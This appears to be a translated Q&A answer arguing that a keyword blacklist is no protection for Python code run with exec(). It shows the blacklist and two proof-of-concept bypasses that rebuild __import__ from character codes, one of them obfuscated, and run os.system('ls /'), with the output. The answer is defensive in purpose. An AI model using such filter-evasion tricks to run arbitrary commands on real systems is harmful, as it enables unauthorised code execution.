<p>不,这是不安全的,而且永远不会真正安全。请参阅此快速演示:</p>
<pre><code>def validateUserCode(user_code):
unsupported_commands = ['import ','print(', 'with ', '.close(', '.read(', '.readline(', 'open(']
for command in unsupported_commands:
if command in user_code:
raise ValueError(command)
user_code = """
imp = __builtins__.__dict__[f"__{''.join(map(chr,(105,109,112,111,114,116)))}__"]
os = imp("os")
os.system("ls /")
"""
validateUserCode(user_code)
exec(user_code)
</code></pre>
<blockquote>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Applications Users cores home sbin var
Library Volumes dev opt tmp
System bin etc private usr
</code></pre>
</blockquote>
<p>或者,如果您愿意的话,可以选择更模糊的一种:</p>
<pre><code>def validateUserCode(user_code):
unsupported_commands = ['import ','print(', 'with ', '.close(', '.read(', '.readline(', 'open(']
for command in unsupported_commands:
if command in user_code:
raise ValueError(command)
user_code = """
f=lambda*a,l=(95,)*2:''.join(map(chr,(*l,*a,*l)))
imp = getattr(globals()[f(98,117,105,108,116,105,110,115)],f(100,105,99,116))[f(105,109,112,111,114,116)]
os = imp("os")
os.system("ls /")
"""
validateUserCode(user_code)
exec(user_code)
</code></pre>
<blockquote>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Applications Users cores home sbin var
Library Volumes dev opt tmp
System bin etc private usr
</code></pre>
</blockquote>
<p>另外:您正试图将<code>'print('</code>列入黑名单,这仍然使<code>print ("foo")</code>100%可用,这一事实表明您不应该费心尝试实现这一点</p>